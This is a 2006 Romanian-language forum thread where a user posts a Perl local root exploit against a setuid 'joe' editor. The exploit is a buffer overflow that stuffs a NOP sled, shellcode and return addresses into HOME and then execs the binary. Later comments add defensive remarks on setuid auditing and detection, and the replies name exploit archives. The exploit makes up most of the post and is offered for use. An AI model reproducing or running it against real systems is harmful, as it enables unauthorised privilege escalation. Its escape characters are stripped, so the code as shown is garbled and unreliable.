mario23 Posted July 9, 2006
#!/usr/bin/perl
# ***
#  __________        ___ ___
#  ______  __ __  ______/  |
#  |    _/  |  /  ___/   _
#  |   |   |  /___     /
#  |____|_  /____//____  >___|_  /
#      /      /    /
# ***
# r57joe.pl
# Linux "joe" local exploit
# by 1dt.w0lf // RusH security team
# ***
# usage: ./joe [offset]
# by default offset = -1000 : tested on ASPlinux 9.0
#
# Reviewer summary: a proof-of-concept aimed at a setuid /usr/bin/joe.
# It builds one long string, stores it in the HOME environment variable,
# and then exec()s joe. Every string literal below is reproduced
# character-for-character from the forum page; the page extraction may
# have altered them, so this is not a verified copy of the original file.
#
# NOTE(review): HOME is the only channel the script uses to hand data to
# joe, which suggests the targeted build copies HOME into a fixed-size
# buffer without a length check. The joe source is not shown here;
# confirm against the vendor advisory or package changelog.

# Size budget used by the loop bounds below, a base address, and the
# adjustment added to that address (replaced by the command-line argument).
$len=1056;
$ret = 0xbfffffb1;
$offset = -1000;
# Filler unit appended repeatedly ahead of the payload string.
$nop = "x90";
# proof of concept
$shellcode =
    "x31xdbx89xd8xb0x17xcdx80" .
    "x31xdbx89xd8xb0x2excdx80" .
    "xebx1fx5fx89xfcx66xf7xd4x31xc0x8ax07" .
    "x47x57xaex75xfdx88x67xffx48x75xf6x5b" .
    "x53x50x5ax89xe1xb0x0bxcdx80xe8xdcxff" .
    "xffxffx01x2fx74x6dx70x2fx73x68x01";

# Anything other than exactly one argument prints the usage banner and exits.
if(@ARGV != 1){
    print "-----------------------------n";
    print "*** joe.pln";
    print "*** linux joe local exploitn";
    print "*** usage: ./joe.pl [offset]n";
    print "*** offset -1000 : tested on ASPLinux 9.0n";
    print "-----------------------------n";
    exit();
}
# The single argument overrides the default offset.
if (@ARGV == 1){
    $offset = $ARGV[0];
}

# Defender's note: the script stops here unless /usr/bin/joe carries the
# setuid bit (-u), so that bit is the precondition for any privilege gain.
# A text editor has no need for it; auditing for unexpected setuid
# binaries and clearing the bit removes this exposure.
if( ! -u "/usr/bin/joe" ){
    print "joe is not suid (n";
    exit();
}

# Leading filler: one $nop per iteration, with the count derived from $len
# minus the payload length and the 156-byte tail appended further down.
for ($i = 0; $i < ($len - length($shellcode) - 156); $i++) {
    $buffer .= $nop;
}
$buffer .= $shellcode;
# pack('l', ...) encodes ($ret + $offset) as a native signed long.
$pack_ret = pack('l', ($ret + $offset));
chomp($pack_ret);
# Tail: the packed value repeated 39 times (the counter advances by 4 up to 156).
for($i = 0; $i < 156; $i += 4) {
    $buffer .= $pack_ret;
}

print "-----------------------------n";
print "*** joe local exploit by r57n";
print "-----------------------------n";
print "OFFSET : $offsetn";
print "-----------------------------n";
# The assembled string becomes HOME for the process started by exec(),
# which replaces this script with /usr/bin/joe.
# Detection idea: a setuid program started with an unusually long HOME
# value that is not a plausible filesystem path is anomalous; exec auditing
# that records environment contents or size can surface it.
local($ENV{'HOME'}) = $buffer;
exec("/usr/bin/joe");
# EOF
Screech Posted July 9, 2006 mario23, mersi ptr ele dar te mai opresti
imported_ZbeNg Posted July 11, 2006 superb
mario23 Posted July 11, 2006 Xavier daca vrei tu ma opresc :@
nos Posted July 11, 2006 mai posteaza mai mario si dane si noua sursa.....
mario23 Posted July 11, 2006 nos, ce sursa frate
nos Posted July 12, 2006 de unde iei tu astea :@
mario23 Posted July 14, 2006 Sursele mele sunt www.milw0rm.com, www.packetstormsecurity.org si siturile rusesti, daca stii rusa uita-te pe www.video.antichat.ru {sursa principala} de acolo gasesti linkuri numai sa stii tu rusa